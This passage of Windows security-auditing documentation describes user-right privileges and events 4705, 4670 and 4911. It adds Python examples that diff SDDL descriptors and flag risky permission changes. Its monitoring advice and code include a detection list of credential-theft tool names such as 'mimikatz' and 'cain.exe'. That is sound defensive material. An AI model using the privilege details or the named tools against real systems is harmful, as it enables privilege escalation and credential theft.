Trusted for Delegation setting on a
user or computer object.
The user or object that is granted this
privilege must have write access to the
account control flags on the user or
computer object. A server process
running on a computer (or under a user
context) that is trusted for delegation
can access resources on another
computer using the delegated
credentials of a client, as long as the
account of the client does not have the
Account cannot be delegated
account control flag set.

SeImpersonatePrivilege
  User right (Group Policy name): Impersonate a client after authentication
  Description: With this privilege, the user can impersonate other accounts.

SeIncreaseBasePriorityPrivilege
  User right (Group Policy name): Increase scheduling priority
  Description: Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.

SeIncreaseQuotaPrivilege
  User right (Group Policy name): Adjust memory quotas for a process
  Description: Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.

SeIncreaseWorkingSetPrivilege
  User right (Group Policy name): Increase a process working set
  Description: Required to allocate more memory for applications that run in the context of users.

SeLoadDriverPrivilege
  User right (Group Policy name): Load and unload device drivers
  Description: Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.

SeLockMemoryPrivilege
  User right (Group Policy name): Lock pages in memory
  Description: Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).

SeMachineAccountPrivilege
  User right (Group Policy name): Add workstations to domain
  Description: With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.

SeManageVolumePrivilege
  User right (Group Policy name): Perform volume maintenance tasks
  Description: Required to run maintenance tasks on a volume, such as remote defragmentation.

SeProfileSingleProcessPrivilege
  User right (Group Policy name): Profile single process
  Description: Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.

SeRelabelPrivilege
  User right (Group Policy name): Modify an object label
  Description: Required to modify the mandatory integrity level of an object.

SeRemoteShutdownPrivilege
  User right (Group Policy name): Force shutdown from a remote system
  Description: Required to shut down a system using a network request.

SeRestorePrivilege
  User right (Group Policy name): Restore files and directories
  Description: Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed-up files and directories, and can set any valid security principal as the owner of an object.

SeSecurityPrivilege
  User right (Group Policy name): Manage auditing and security log
  Description: Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.

SeShutdownPrivilege
  User right (Group Policy name): Shut down the system
  Description: Required to shut down a local system.

SeSyncAgentPrivilege
  User right (Group Policy name): Synchronize directory service data
  Description: This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege
  User right (Group Policy name): Modify firmware environment values
  Description: Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege
  User right (Group Policy name): Profile system performance
  Description: Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege
  User right (Group Policy name): Change the system time
  Description: Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege
  User right (Group Policy name): Take ownership of files or other objects
  Description: Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege
  User right (Group Policy name): Act as part of the operating system
  Description: This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege
  User right (Group Policy name): Change the time zone
  Description: Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege
  User right (Group Policy name): Access Credential Manager as a trusted caller
  Description: Required to access Credential Manager as a trusted caller.

SeUndockPrivilege
  User right (Group Policy name): Remove computer from docking station
  Description: Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege
  User right (Group Policy name): Not applicable
  Description: Required to read unsolicited input from a terminal device.

Security Monitoring Recommendations

For 4705(S): A user right was removed.

Actions typically performed by the SYSTEM account: This event and certain other events should be monitored to see if they are triggered by any account other than SYSTEM.
Recommendation: Because this event is typically triggered by the SYSTEM account, we recommend that you report it whenever “Subject\Security ID” is not SYSTEM.

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Subject\Security ID” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the “Subject\Security ID” or “Target Account\Account Name” that correspond to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist. If you have specific user rights policies, for example, a whitelist of accounts that can perform certain actions, monitor this event to confirm that it was appropriate that the “Removed Right” was removed from “Target Account\Account Name.”

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” and “Target Account\Account Name” to see whether the account type is as expected. For example, if some accounts have critical user rights which should never be removed, monitor this event for the “Target Account\Account Name” and the appropriate rights. As another example, if non-administrative accounts should never be granted certain user rights (for example, SeAuditPrivilege), you might monitor this event, because a right can be removed only after it was previously granted.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should perform only limited actions, or no actions at all.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about. Also be sure to check “Target Account\Account Name” to see whether user rights should be removed from that account (or whether that account should have any rights on that computer). For high-value servers or other computers, we recommend that you track this event and investigate whether the specific “Removed Right” should be removed from “Target Account\Account Name” in each case.

User rights that should be restricted: You might have a list of user rights that you want to monitor.
Recommendation: Monitor this event and compare the “Removed Right” to your list of restricted rights. Monitor this event to discover the removal of a right that should never have been granted (for example, SeTcbPrivilege), so that you can investigate further.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
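The recommendations above amount to a small set of rules over three fields of the 4705 event: the subject, the target account and the removed right. The Python below is an added example (not code from the original document or from Microsoft) that evaluates constructed 4705 events against those rules. Dictionary keys follow the field labels used in the table; the policy lists (restricted rights, high-value and never-used accounts, the naming pattern) and the sample events are assumptions that an organization would replace with its own.

```python
import re

# Well-known SID of the Local System (SYSTEM) account.
SYSTEM_SID = "S-1-5-18"

# Policy lists an organization would maintain. These are constructed for the
# example; only SeTcbPrivilege and SeAuditPrivilege are named in the text.
RESTRICTED_RIGHTS = {"SeDebugPrivilege", "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege"}
NEVER_GRANTED_RIGHTS = {"SeTcbPrivilege", "SeAuditPrivilege"}
HIGH_VALUE_ACCOUNTS = {"CONTOSO\\dadmin"}
NEVER_USED_ACCOUNTS = {"CONTOSO\\Guest", "CONTOSO\\svc-legacy"}
# Assumed naming convention: lowercase user names (optionally numbered),
# "svc-" prefixed service accounts, or machine accounts ending in "$".
NAME_PATTERN = re.compile(r"^(?:[a-z]+\d*|svc-[a-z0-9]+|[A-Za-z0-9-]+\$)$")


def evaluate_4705(event):
    """Apply the monitoring recommendations to one 4705 event.

    `event` is a dict keyed by the field labels used in the event description
    ("Subject\\Security ID", "Target Account\\Account Name", "Removed Right", ...).
    Returns a list of (rule, detail) findings; an empty list means nothing to report.
    """
    findings = []
    subject_sid = event["Subject\\Security ID"]
    subject_name = event["Subject\\Account Name"]
    subject = event["Subject\\Account Domain"] + "\\" + subject_name
    target = event["Target Account\\Account Domain"] + "\\" + event["Target Account\\Account Name"]
    # "Removed Right" may list several privileges, one per line.
    removed = set(event["Removed Right"].split())

    # Rule 1: this event is normally raised by SYSTEM; any other subject is reportable.
    if subject_sid != SYSTEM_SID:
        findings.append(("non-system-subject", subject))
    # Rule 2: every action by a high-value account is tracked.
    if subject in HIGH_VALUE_ACCOUNTS:
        findings.append(("high-value-subject", subject))
    # Rule 3: accounts that should never be used, as subject or as target.
    if subject in NEVER_USED_ACCOUNTS:
        findings.append(("never-used-account", subject))
    elif target in NEVER_USED_ACCOUNTS:
        findings.append(("never-used-account", target))
    # Rule 4: the removed right is on the restricted list.
    for right in sorted(removed & RESTRICTED_RIGHTS):
        findings.append(("restricted-right-removed", right))
    # Rule 5: a right can only be removed after it was granted, so the removal of a
    # right that should never be granted proves it was held at some point.
    for right in sorted(removed & NEVER_GRANTED_RIGHTS):
        findings.append(("never-granted-right-was-held", right))
    # Rule 6: naming convention on the subject account.
    if not NAME_PATTERN.match(subject_name):
        findings.append(("naming-convention", subject_name))
    return findings


# Constructed sample events (not from the original document).
SAMPLE_EVENTS = [
    {   # routine: SYSTEM removes a right from a service account
        "Subject\\Security ID": SYSTEM_SID, "Subject\\Account Name": "DC01$",
        "Subject\\Account Domain": "CONTOSO",
        "Target Account\\Account Name": "svc-backup", "Target Account\\Account Domain": "CONTOSO",
        "Removed Right": "SeBackupPrivilege",
    },
    {   # reportable: an interactive account removes SeTcbPrivilege from Guest
        "Subject\\Security ID": "S-1-5-21-3457937927-2839227994-823803824-1104",
        "Subject\\Account Name": "dadmin", "Subject\\Account Domain": "CONTOSO",
        "Target Account\\Account Name": "Guest", "Target Account\\Account Domain": "CONTOSO",
        "Removed Right": "SeTcbPrivilege\nSeDebugPrivilege",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Subject\\Account Name"], "->", evaluate_4705(ev))
```

The first sample produces no findings; the second triggers five rules at once, which is the point of evaluating all of them per event rather than stopping at the first match: the analyst sees that a non-SYSTEM, high-value subject touched a never-used account and that SeTcbPrivilege had been held by it.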
4670(S): Permissions on an object were changed.
4/5/2019 • 8 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Registry, Audit Authentication Policy Change, and Audit Authorization Policy Change
Event Description:
This event generates when the permissions for an object are changed. The object could be a file system, registry, or security token object.
This event does not generate if the SACL (Auditing ACL) was changed.
Before this event can generate, certain ACEs might need to be set in the object’s SACL. For example, for a file system object, it generates only if “Change Permissions” and/or “Take Ownership” are set in the object’s SACL. For a registry key, it generates only if “Write DAC” and/or “Write Owner” are set in the object’s SACL.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4670</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13570</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T19:36:50.187044600Z" />
    <EventRecordID>269529</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x43659</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Documents\netcat-1.11</Data>
    <Data Name="HandleId">0x3f0</Data>
    <Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
    <Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
    <Data Name="ProcessId">0xdb0</Data>
    <Data Name="ProcessName">C:\Windows\System32\dllhost.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “change object’s permissions” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change object’s
permissions” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following list contains the most common Object Types:
Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port.

Object Name [Type = UnicodeString]: name and other identifying information for the object for which
permissions were changed. For example, for a file, the path would be included. For Token objects, this field
typically equals “-“.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the permissions were
changed. Process ID (PID ) is a number used by the operating system to uniquely identify an active
process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Permissions Change:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL) value for the object.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language (SDDL) value for the object.

Note: The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below:

Value: Description
"AO": Account operators
"RU": Alias to allow previous Windows 2000
"AN": Anonymous logon
"AU": Authenticated users
"BA": Built-in administrators
"BG": Built-in guests
"BO": Backup operators
"BU": Built-in users
"CA": Certificate server administrators
"CG": Creator group
"CO": Creator owner
"DA": Domain administrators
"DC": Domain computers
"DD": Domain controllers
"DG": Domain guests
"DU": Domain users
"EA": Enterprise administrators
"ED": Enterprise domain controllers
"WD": Everyone
"PA": Group Policy administrators
"IU": Interactively logged-on user
"LA": Local administrator
"LG": Local guest
"LS": Local service account
"SY": Local system
"NU": Network logon user
"NO": Network configuration operators
"NS": Network service account
"PO": Printer operators
"PS": Personal self
"PU": Power users
"RS": RAS servers group
"RD": Terminal server users
"RE": Replicator
"RC": Restricted code
"SA": Schema administrators
"SO": Server operators
"SU": Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
"D" - DACL
"S" - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, Inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, Inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, Child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: Child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: Child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ace.
"IO" - INHERITANCE ONLY: ace doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask or reserved value, for example: FA (File All
Access), FX (File Execute), FW (File Write), etc.

Generic access rights:
"GA": GENERIC ALL
"GR": GENERIC READ
"GW": GENERIC WRITE
"GX": GENERIC EXECUTE
File access rights:
"FA": FILE ALL ACCESS
"FR": FILE GENERIC READ
"FW": FILE GENERIC WRITE
"FX": FILE GENERIC EXECUTE
Registry key access rights:
"KA": KEY ALL ACCESS
"K": KEY READ
"KW": KEY WRITE
"KX": KEY EXECUTE
Directory service access rights:
"RC": Read Permissions
"SD": Delete
"WD": Modify Permissions
"WO": Modify Owner
"RP": Read All Properties
"WP": Write All Properties
"CC": Create All Child Objects
"DC": Delete All Child Objects
"LC": List Contents
"SW": All Validated Writes
"LO": List Object
"DT": Delete Subtree
"CR": All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.

For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.

Security Monitoring Recommendations

For 4670(S): Permissions on an object were changed.
For token objects, this is typically an informational event, and at the same time it is difficult to identify which token's permissions were changed. For token objects, there are no monitoring recommendations for this event in this document.
For file system and registry objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit
events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If you have critical registry objects for which you need to monitor all modifications (especially permissions
changes and owner changes), monitor for the specific Object\Object Name.
If you have high-value computers for which you need to monitor all changes for all or specific objects (for
example, file system or registry objects), monitor for all 4670 events on these computers. For example, you
could monitor the ntds.dit file on domain controllers.
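The SDDL grammar described in the field descriptions, combined with the recommendations above, is enough to diff the “Original Security Descriptor” and “New Security Descriptor” of a 4670 event and surface the change that matters most in practice: a new allow ACE that gives a broad trustee such as Everyone write-class access to the object. The Python below is an added example, not code from the original document or from Microsoft. It parses the O:/G:/D:/S: components and their ACEs (including the nested resource-attribute payload an RA ACE can carry), diffs the DACLs and applies the process-name checks. The sample event reuses the OldSd/NewSd strings from the 4670 event XML above; the trustee set, folder lists and the choice of access-mask bits that count as “write” are assumptions of this example.

```python
from dataclasses import dataclass

# Well-known SID aliases (a subset of the table above).
SID_ALIASES = {"WD": "Everyone", "AU": "Authenticated users", "BU": "Built-in users",
               "AN": "Anonymous logon", "BA": "Built-in administrators", "SY": "Local system"}
# Trustees that make an allow ACE "broad" for monitoring purposes (assumed policy).
BROAD_TRUSTEES = {"WD", "AU", "BU", "AN", "S-1-1-0", "S-1-5-11"}
# Access-mask bits treated as write-class access:
# FILE_WRITE_DATA | FILE_APPEND_DATA | DELETE | WRITE_DAC | WRITE_OWNER
WRITE_MASK = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000
# Rights aliases from the table above that include write-class access.
WRITE_ALIASES = {"FA", "FW", "GA", "GW", "KA", "KW", "WD", "WO", "SD"}


@dataclass(frozen=True)
class Ace:
    ace_type: str            # "A" allowed, "D" denied, "AU" audit, "RA" resource attribute, ...
    flags: str               # packed two-letter tokens, e.g. "OICIID"
    rights: str              # alias string such as "FA" or a hex mask such as "0x1200a9"
    object_guid: str
    inherit_object_guid: str
    trustee: str             # alias such as "WD" or a full S-1-... SID
    extra: str = ""          # resource-attribute or conditional payload, if any


def split_sddl(sddl):
    """Split an SDDL string into its O:, G:, D: and S: components.
    Component markers are only recognised outside parentheses, so ACE bodies
    (which may contain nested parentheses) are never mistaken for markers."""
    parts, depth, key, start, i = {}, 0, None, 0, 0
    while i < len(sddl):
        ch = sddl[i]
        if depth == 0 and ch in "OGDS" and sddl[i + 1:i + 2] == ":":
            if key is not None:
                parts[key] = sddl[start:i]
            key, start, i = ch, i + 2, i + 2
            continue
        depth += (ch == "(") - (ch == ")")
        i += 1
    if key is not None:
        parts[key] = sddl[start:]
    return parts


def parse_acl(component):
    """Return (inheritance_flags, [Ace, ...]) for the value of a D: or S: component."""
    first = component.find("(")
    flags = component if first < 0 else component[:first]
    aces, depth, start = [], 0, 0
    for i, ch in enumerate(component):
        if ch == "(":
            if depth == 0:
                start = i + 1
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                aces.append(parse_ace(component[start:i]))
    return flags, aces


def parse_ace(body):
    """Parse ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid[;extra]."""
    fields = body.split(";")
    if len(fields) < 6:
        raise ValueError("malformed ACE: " + body)
    return Ace(*fields[:6], extra=";".join(fields[6:]))


def grants_write(rights):
    """True if an ACE rights string confers any write-class access."""
    if rights.lower().startswith("0x"):
        return int(rights, 16) & WRITE_MASK != 0
    tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(tokens & WRITE_ALIASES)


def dacl_diff(old_sddl, new_sddl):
    """Return (added, removed) DACL ACEs between the old and the new descriptor."""
    old = set(parse_acl(split_sddl(old_sddl).get("D", ""))[1])
    new = set(parse_acl(split_sddl(new_sddl).get("D", ""))[1])
    return sorted(new - old, key=str), sorted(old - new, key=str)


# Assumed folder policy, following the recommendations above.
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\", "\\temp\\")
RESTRICTED_PROCESS_WORDS = ("mimikatz", "cain.exe")


def triage_4670(event, expected_process=None):
    """Apply the 4670 recommendations to one event given as a dict of its
    EventData fields (OldSd, NewSd, ProcessName). Returns a list of findings."""
    findings = []
    added, removed = dacl_diff(event["OldSd"], event["NewSd"])
    for ace in added:
        if ace.ace_type == "A" and ace.trustee in BROAD_TRUSTEES and grants_write(ace.rights):
            who = SID_ALIASES.get(ace.trustee, ace.trustee)
            findings.append(("broad-write-access-added", who + ": " + ace.rights))
    for ace in removed:
        if ace.ace_type == "D":   # a deny ACE disappearing widens access too
            findings.append(("deny-ace-removed", ace.trustee))
    proc = event["ProcessName"].lower()
    if expected_process and proc != expected_process.lower():
        findings.append(("unexpected-process", event["ProcessName"]))
    if not proc.startswith(STANDARD_FOLDERS) or any(f in proc for f in RESTRICTED_FOLDERS):
        findings.append(("process-outside-standard-folder", event["ProcessName"]))
    if any(w in proc for w in RESTRICTED_PROCESS_WORDS):
        findings.append(("restricted-process-name", event["ProcessName"]))
    return findings


# The OldSd/NewSd pair and process name from the 4670 example event above.
SAMPLE_4670 = {
    "ObjectName": "C:\\Documents\\netcat-1.11",
    "OldSd": "D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)"
             "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)"
             "(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)",
    "NewSd": "D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)"
             "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)"
             "(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)",
    "ProcessName": "C:\\Windows\\System32\\dllhost.exe",
}

if __name__ == "__main__":
    for finding in triage_4670(SAMPLE_4670):
        print(*finding)
```

On the example event the diff yields exactly one added ACE, (A;OICI;FA;;;WD), which grants Everyone full access and is reported; the process lives in System32, so the folder checks stay quiet. Note that the hex form of the rights field (for instance 0xf0007 in the SDDL example above) is interpreted as a mask, while aliases such as FA or FW are matched as two-letter tokens.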
4911(S): Resource attributes of the object were changed.
4/5/2019 • 7 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authorization Policy Change
Event Description:
This event generates when resource attributes of the file system object were changed.
Resource attributes for a file or folder can be changed, for example, using Windows File Explorer (object’s Properties->Classification tab).

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4911</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13570</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-09T23:43:04.009319300Z" />
    <EventRecordID>1183714</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x37925</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Audit Files\HBI Data.txt</Data>
    <Data Name="HandleId">0x49c</Data>
    <Data Name="OldSd">S:AI</Data>
    <Data Name="NewSd">S:ARAI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))</Data>
    <Data Name="ProcessId">0x67c</Data>
    <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2012, Windows 8.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that changed the resource attributes of the file system object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that changed the resource attributes of
the file system object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation. Always
“File” for this event.
The following list contains the most common Object Types:
